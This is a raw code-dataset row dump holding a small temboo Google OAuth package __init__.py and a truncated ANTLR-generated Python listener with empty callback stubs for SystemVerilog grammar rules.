hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7ccc320548cc3532a16790b1400d23010cb9ea34
| 312
|
py
|
Python
|
temboo/core/Library/Google/OAuth/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/Google/OAuth/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/Google/OAuth/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.Google.OAuth.FinalizeOAuth import FinalizeOAuth, FinalizeOAuthInputSet, FinalizeOAuthResultSet, FinalizeOAuthChoreographyExecution
from temboo.Library.Google.OAuth.InitializeOAuth import InitializeOAuth, InitializeOAuthInputSet, InitializeOAuthResultSet, InitializeOAuthChoreographyExecution
| 104
| 160
| 0.910256
| 22
| 312
| 12.909091
| 0.636364
| 0.070423
| 0.119718
| 0.161972
| 0.197183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.044872
| 312
| 2
| 161
| 156
| 0.95302
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7cf09c10f24fe12d8b17049e5ecec3098c3ef933
| 274,330
|
py
|
Python
|
verilog_langserver/verilog_parser/antlr_build/diagnosis/SystemVerilogListener.py
|
eirikpre/verilog-langserver
|
e18545b139e40fe935bad430daf43e70553003a4
|
[
"MIT"
] | 1
|
2020-09-24T02:30:10.000Z
|
2020-09-24T02:30:10.000Z
|
verilog_langserver/verilog_parser/antlr_build/diagnosis/SystemVerilogListener.py
|
eirikpre/verilog-langserver
|
e18545b139e40fe935bad430daf43e70553003a4
|
[
"MIT"
] | null | null | null |
verilog_langserver/verilog_parser/antlr_build/diagnosis/SystemVerilogListener.py
|
eirikpre/verilog-langserver
|
e18545b139e40fe935bad430daf43e70553003a4
|
[
"MIT"
] | null | null | null |
# Generated from C:\Users\eirik\Desktop\verilog-langserver\verilog_langserver\verilog_parser/grammar/diagnosis/SystemVerilog.g4 by ANTLR 4.8
from antlr4 import *
if __name__ is not None and "." in __name__:
from .SystemVerilogParser import SystemVerilogParser
else:
from SystemVerilogParser import SystemVerilogParser
# This class defines a complete listener for a parse tree produced by SystemVerilogParser.
class SystemVerilogListener(ParseTreeListener):
# Enter a parse tree produced by SystemVerilogParser#system_verilog_text.
def enterSystem_verilog_text(self, ctx:SystemVerilogParser.System_verilog_textContext):
pass
# Exit a parse tree produced by SystemVerilogParser#system_verilog_text.
def exitSystem_verilog_text(self, ctx:SystemVerilogParser.System_verilog_textContext):
pass
# Enter a parse tree produced by SystemVerilogParser#source_text.
def enterSource_text(self, ctx:SystemVerilogParser.Source_textContext):
pass
# Exit a parse tree produced by SystemVerilogParser#source_text.
def exitSource_text(self, ctx:SystemVerilogParser.Source_textContext):
pass
# Enter a parse tree produced by SystemVerilogParser#description.
def enterDescription(self, ctx:SystemVerilogParser.DescriptionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#description.
def exitDescription(self, ctx:SystemVerilogParser.DescriptionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_nonansi_header.
def enterModule_nonansi_header(self, ctx:SystemVerilogParser.Module_nonansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_nonansi_header.
def exitModule_nonansi_header(self, ctx:SystemVerilogParser.Module_nonansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_ansi_header.
def enterModule_ansi_header(self, ctx:SystemVerilogParser.Module_ansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_ansi_header.
def exitModule_ansi_header(self, ctx:SystemVerilogParser.Module_ansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_declaration.
def enterModule_declaration(self, ctx:SystemVerilogParser.Module_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_declaration.
def exitModule_declaration(self, ctx:SystemVerilogParser.Module_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_keyword.
def enterModule_keyword(self, ctx:SystemVerilogParser.Module_keywordContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_keyword.
def exitModule_keyword(self, ctx:SystemVerilogParser.Module_keywordContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_declaration.
def enterInterface_declaration(self, ctx:SystemVerilogParser.Interface_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_declaration.
def exitInterface_declaration(self, ctx:SystemVerilogParser.Interface_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_nonansi_header.
def enterInterface_nonansi_header(self, ctx:SystemVerilogParser.Interface_nonansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_nonansi_header.
def exitInterface_nonansi_header(self, ctx:SystemVerilogParser.Interface_nonansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_ansi_header.
def enterInterface_ansi_header(self, ctx:SystemVerilogParser.Interface_ansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_ansi_header.
def exitInterface_ansi_header(self, ctx:SystemVerilogParser.Interface_ansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_declaration.
def enterProgram_declaration(self, ctx:SystemVerilogParser.Program_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_declaration.
def exitProgram_declaration(self, ctx:SystemVerilogParser.Program_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_nonansi_header.
def enterProgram_nonansi_header(self, ctx:SystemVerilogParser.Program_nonansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_nonansi_header.
def exitProgram_nonansi_header(self, ctx:SystemVerilogParser.Program_nonansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_ansi_header.
def enterProgram_ansi_header(self, ctx:SystemVerilogParser.Program_ansi_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_ansi_header.
def exitProgram_ansi_header(self, ctx:SystemVerilogParser.Program_ansi_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_declaration.
def enterChecker_declaration(self, ctx:SystemVerilogParser.Checker_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_declaration.
def exitChecker_declaration(self, ctx:SystemVerilogParser.Checker_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#class_declaration.
def enterClass_declaration(self, ctx:SystemVerilogParser.Class_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#class_declaration.
def exitClass_declaration(self, ctx:SystemVerilogParser.Class_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_class_type.
def enterInterface_class_type(self, ctx:SystemVerilogParser.Interface_class_typeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_class_type.
def exitInterface_class_type(self, ctx:SystemVerilogParser.Interface_class_typeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_class_declaration.
def enterInterface_class_declaration(self, ctx:SystemVerilogParser.Interface_class_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_class_declaration.
def exitInterface_class_declaration(self, ctx:SystemVerilogParser.Interface_class_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_class_item.
def enterInterface_class_item(self, ctx:SystemVerilogParser.Interface_class_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_class_item.
def exitInterface_class_item(self, ctx:SystemVerilogParser.Interface_class_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_class_method.
def enterInterface_class_method(self, ctx:SystemVerilogParser.Interface_class_methodContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_class_method.
def exitInterface_class_method(self, ctx:SystemVerilogParser.Interface_class_methodContext):
pass
# Enter a parse tree produced by SystemVerilogParser#package_declaration.
def enterPackage_declaration(self, ctx:SystemVerilogParser.Package_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#package_declaration.
def exitPackage_declaration(self, ctx:SystemVerilogParser.Package_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#timeunits_declaration.
def enterTimeunits_declaration(self, ctx:SystemVerilogParser.Timeunits_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#timeunits_declaration.
def exitTimeunits_declaration(self, ctx:SystemVerilogParser.Timeunits_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#timescale_compiler_directive.
def enterTimescale_compiler_directive(self, ctx:SystemVerilogParser.Timescale_compiler_directiveContext):
pass
# Exit a parse tree produced by SystemVerilogParser#timescale_compiler_directive.
def exitTimescale_compiler_directive(self, ctx:SystemVerilogParser.Timescale_compiler_directiveContext):
pass
# Enter a parse tree produced by SystemVerilogParser#time_precision.
def enterTime_precision(self, ctx:SystemVerilogParser.Time_precisionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#time_precision.
def exitTime_precision(self, ctx:SystemVerilogParser.Time_precisionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#include_compiler_directive.
def enterInclude_compiler_directive(self, ctx:SystemVerilogParser.Include_compiler_directiveContext):
pass
# Exit a parse tree produced by SystemVerilogParser#include_compiler_directive.
def exitInclude_compiler_directive(self, ctx:SystemVerilogParser.Include_compiler_directiveContext):
pass
# Enter a parse tree produced by SystemVerilogParser#parameter_port_list.
def enterParameter_port_list(self, ctx:SystemVerilogParser.Parameter_port_listContext):
pass
# Exit a parse tree produced by SystemVerilogParser#parameter_port_list.
def exitParameter_port_list(self, ctx:SystemVerilogParser.Parameter_port_listContext):
pass
# Enter a parse tree produced by SystemVerilogParser#parameter_port_declaration.
def enterParameter_port_declaration(self, ctx:SystemVerilogParser.Parameter_port_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#parameter_port_declaration.
def exitParameter_port_declaration(self, ctx:SystemVerilogParser.Parameter_port_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#list_of_ports.
def enterList_of_ports(self, ctx:SystemVerilogParser.List_of_portsContext):
pass
# Exit a parse tree produced by SystemVerilogParser#list_of_ports.
def exitList_of_ports(self, ctx:SystemVerilogParser.List_of_portsContext):
pass
# Enter a parse tree produced by SystemVerilogParser#list_of_port_declarations.
def enterList_of_port_declarations(self, ctx:SystemVerilogParser.List_of_port_declarationsContext):
pass
# Exit a parse tree produced by SystemVerilogParser#list_of_port_declarations.
def exitList_of_port_declarations(self, ctx:SystemVerilogParser.List_of_port_declarationsContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port_declaration.
def enterPort_declaration(self, ctx:SystemVerilogParser.Port_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port_declaration.
def exitPort_declaration(self, ctx:SystemVerilogParser.Port_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port.
def enterPort(self, ctx:SystemVerilogParser.PortContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port.
def exitPort(self, ctx:SystemVerilogParser.PortContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port_expression.
def enterPort_expression(self, ctx:SystemVerilogParser.Port_expressionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port_expression.
def exitPort_expression(self, ctx:SystemVerilogParser.Port_expressionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port_reference.
def enterPort_reference(self, ctx:SystemVerilogParser.Port_referenceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port_reference.
def exitPort_reference(self, ctx:SystemVerilogParser.Port_referenceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#port_direction.
def enterPort_direction(self, ctx:SystemVerilogParser.Port_directionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#port_direction.
def exitPort_direction(self, ctx:SystemVerilogParser.Port_directionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#net_port_header.
def enterNet_port_header(self, ctx:SystemVerilogParser.Net_port_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#net_port_header.
def exitNet_port_header(self, ctx:SystemVerilogParser.Net_port_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#variable_port_header.
def enterVariable_port_header(self, ctx:SystemVerilogParser.Variable_port_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#variable_port_header.
def exitVariable_port_header(self, ctx:SystemVerilogParser.Variable_port_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_port_header.
def enterInterface_port_header(self, ctx:SystemVerilogParser.Interface_port_headerContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_port_header.
def exitInterface_port_header(self, ctx:SystemVerilogParser.Interface_port_headerContext):
pass
# Enter a parse tree produced by SystemVerilogParser#ansi_port_declaration.
def enterAnsi_port_declaration(self, ctx:SystemVerilogParser.Ansi_port_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#ansi_port_declaration.
def exitAnsi_port_declaration(self, ctx:SystemVerilogParser.Ansi_port_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#elaboration_system_task.
def enterElaboration_system_task(self, ctx:SystemVerilogParser.Elaboration_system_taskContext):
pass
# Exit a parse tree produced by SystemVerilogParser#elaboration_system_task.
def exitElaboration_system_task(self, ctx:SystemVerilogParser.Elaboration_system_taskContext):
pass
# Enter a parse tree produced by SystemVerilogParser#finish_number.
def enterFinish_number(self, ctx:SystemVerilogParser.Finish_numberContext):
pass
# Exit a parse tree produced by SystemVerilogParser#finish_number.
def exitFinish_number(self, ctx:SystemVerilogParser.Finish_numberContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_common_item.
def enterModule_common_item(self, ctx:SystemVerilogParser.Module_common_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_common_item.
def exitModule_common_item(self, ctx:SystemVerilogParser.Module_common_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#simulation_control_task.
def enterSimulation_control_task(self, ctx:SystemVerilogParser.Simulation_control_taskContext):
pass
# Exit a parse tree produced by SystemVerilogParser#simulation_control_task.
def exitSimulation_control_task(self, ctx:SystemVerilogParser.Simulation_control_taskContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_item.
def enterModule_item(self, ctx:SystemVerilogParser.Module_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_item.
def exitModule_item(self, ctx:SystemVerilogParser.Module_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_or_generate_item.
def enterModule_or_generate_item(self, ctx:SystemVerilogParser.Module_or_generate_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_or_generate_item.
def exitModule_or_generate_item(self, ctx:SystemVerilogParser.Module_or_generate_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#module_or_generate_item_declaration.
def enterModule_or_generate_item_declaration(self, ctx:SystemVerilogParser.Module_or_generate_item_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#module_or_generate_item_declaration.
def exitModule_or_generate_item_declaration(self, ctx:SystemVerilogParser.Module_or_generate_item_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#non_port_module_item.
def enterNon_port_module_item(self, ctx:SystemVerilogParser.Non_port_module_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#non_port_module_item.
def exitNon_port_module_item(self, ctx:SystemVerilogParser.Non_port_module_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#parameter_override.
def enterParameter_override(self, ctx:SystemVerilogParser.Parameter_overrideContext):
pass
# Exit a parse tree produced by SystemVerilogParser#parameter_override.
def exitParameter_override(self, ctx:SystemVerilogParser.Parameter_overrideContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bind_directive.
def enterBind_directive(self, ctx:SystemVerilogParser.Bind_directiveContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bind_directive.
def exitBind_directive(self, ctx:SystemVerilogParser.Bind_directiveContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bind_target_scope.
def enterBind_target_scope(self, ctx:SystemVerilogParser.Bind_target_scopeContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bind_target_scope.
def exitBind_target_scope(self, ctx:SystemVerilogParser.Bind_target_scopeContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bind_target_instance.
def enterBind_target_instance(self, ctx:SystemVerilogParser.Bind_target_instanceContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bind_target_instance.
def exitBind_target_instance(self, ctx:SystemVerilogParser.Bind_target_instanceContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bind_target_instance_list.
def enterBind_target_instance_list(self, ctx:SystemVerilogParser.Bind_target_instance_listContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bind_target_instance_list.
def exitBind_target_instance_list(self, ctx:SystemVerilogParser.Bind_target_instance_listContext):
pass
# Enter a parse tree produced by SystemVerilogParser#bind_instantiation.
def enterBind_instantiation(self, ctx:SystemVerilogParser.Bind_instantiationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#bind_instantiation.
def exitBind_instantiation(self, ctx:SystemVerilogParser.Bind_instantiationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#config_declaration.
def enterConfig_declaration(self, ctx:SystemVerilogParser.Config_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#config_declaration.
def exitConfig_declaration(self, ctx:SystemVerilogParser.Config_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#design_statement.
def enterDesign_statement(self, ctx:SystemVerilogParser.Design_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#design_statement.
def exitDesign_statement(self, ctx:SystemVerilogParser.Design_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#config_rule_statement.
def enterConfig_rule_statement(self, ctx:SystemVerilogParser.Config_rule_statementContext):
pass
# Exit a parse tree produced by SystemVerilogParser#config_rule_statement.
def exitConfig_rule_statement(self, ctx:SystemVerilogParser.Config_rule_statementContext):
pass
# Enter a parse tree produced by SystemVerilogParser#default_clause.
def enterDefault_clause(self, ctx:SystemVerilogParser.Default_clauseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#default_clause.
def exitDefault_clause(self, ctx:SystemVerilogParser.Default_clauseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#inst_clause.
def enterInst_clause(self, ctx:SystemVerilogParser.Inst_clauseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#inst_clause.
def exitInst_clause(self, ctx:SystemVerilogParser.Inst_clauseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#inst_name.
def enterInst_name(self, ctx:SystemVerilogParser.Inst_nameContext):
pass
# Exit a parse tree produced by SystemVerilogParser#inst_name.
def exitInst_name(self, ctx:SystemVerilogParser.Inst_nameContext):
pass
# Enter a parse tree produced by SystemVerilogParser#cell_clause.
def enterCell_clause(self, ctx:SystemVerilogParser.Cell_clauseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#cell_clause.
def exitCell_clause(self, ctx:SystemVerilogParser.Cell_clauseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#liblist_clause.
def enterLiblist_clause(self, ctx:SystemVerilogParser.Liblist_clauseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#liblist_clause.
def exitLiblist_clause(self, ctx:SystemVerilogParser.Liblist_clauseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#use_clause.
def enterUse_clause(self, ctx:SystemVerilogParser.Use_clauseContext):
pass
# Exit a parse tree produced by SystemVerilogParser#use_clause.
def exitUse_clause(self, ctx:SystemVerilogParser.Use_clauseContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_or_generate_item.
def enterInterface_or_generate_item(self, ctx:SystemVerilogParser.Interface_or_generate_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_or_generate_item.
def exitInterface_or_generate_item(self, ctx:SystemVerilogParser.Interface_or_generate_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#extern_tf_declaration.
def enterExtern_tf_declaration(self, ctx:SystemVerilogParser.Extern_tf_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#extern_tf_declaration.
def exitExtern_tf_declaration(self, ctx:SystemVerilogParser.Extern_tf_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#interface_item.
def enterInterface_item(self, ctx:SystemVerilogParser.Interface_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#interface_item.
def exitInterface_item(self, ctx:SystemVerilogParser.Interface_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#non_port_interface_item.
def enterNon_port_interface_item(self, ctx:SystemVerilogParser.Non_port_interface_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#non_port_interface_item.
def exitNon_port_interface_item(self, ctx:SystemVerilogParser.Non_port_interface_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_item.
def enterProgram_item(self, ctx:SystemVerilogParser.Program_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_item.
def exitProgram_item(self, ctx:SystemVerilogParser.Program_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#non_port_program_item.
def enterNon_port_program_item(self, ctx:SystemVerilogParser.Non_port_program_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#non_port_program_item.
def exitNon_port_program_item(self, ctx:SystemVerilogParser.Non_port_program_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#program_generate_item.
def enterProgram_generate_item(self, ctx:SystemVerilogParser.Program_generate_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#program_generate_item.
def exitProgram_generate_item(self, ctx:SystemVerilogParser.Program_generate_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_port_list.
def enterChecker_port_list(self, ctx:SystemVerilogParser.Checker_port_listContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_port_list.
def exitChecker_port_list(self, ctx:SystemVerilogParser.Checker_port_listContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_port_item.
def enterChecker_port_item(self, ctx:SystemVerilogParser.Checker_port_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_port_item.
def exitChecker_port_item(self, ctx:SystemVerilogParser.Checker_port_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_port_direction.
def enterChecker_port_direction(self, ctx:SystemVerilogParser.Checker_port_directionContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_port_direction.
def exitChecker_port_direction(self, ctx:SystemVerilogParser.Checker_port_directionContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_or_generate_item.
def enterChecker_or_generate_item(self, ctx:SystemVerilogParser.Checker_or_generate_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_or_generate_item.
def exitChecker_or_generate_item(self, ctx:SystemVerilogParser.Checker_or_generate_itemContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_or_generate_item_declaration.
def enterChecker_or_generate_item_declaration(self, ctx:SystemVerilogParser.Checker_or_generate_item_declarationContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_or_generate_item_declaration.
def exitChecker_or_generate_item_declaration(self, ctx:SystemVerilogParser.Checker_or_generate_item_declarationContext):
pass
# Enter a parse tree produced by SystemVerilogParser#checker_generate_item.
def enterChecker_generate_item(self, ctx:SystemVerilogParser.Checker_generate_itemContext):
pass
# Exit a parse tree produced by SystemVerilogParser#checker_generate_item.
def exitChecker_generate_item(self, ctx:SystemVerilogParser.Checker_generate_itemContext):
pass
    # --- Class / qualifier / method-prototype rule callbacks ----------------
    # NOTE(review): ANTLR-generated no-op listener stubs. Regenerating the
    # grammar overwrites this file; put custom logic in a subclass override.
    # Enter a parse tree produced by SystemVerilogParser#class_item.
    def enterClass_item(self, ctx:SystemVerilogParser.Class_itemContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#class_item.
    def exitClass_item(self, ctx:SystemVerilogParser.Class_itemContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#class_property.
    def enterClass_property(self, ctx:SystemVerilogParser.Class_propertyContext):
        pass
    # Exit a parse tree produced by SystemVerilogParser#class_property.
    def exitClass_property(self, ctx:SystemVerilogParser.Class_propertyContext):
        pass
    # Enter a parse tree produced by SystemVerilogParser#class_method.
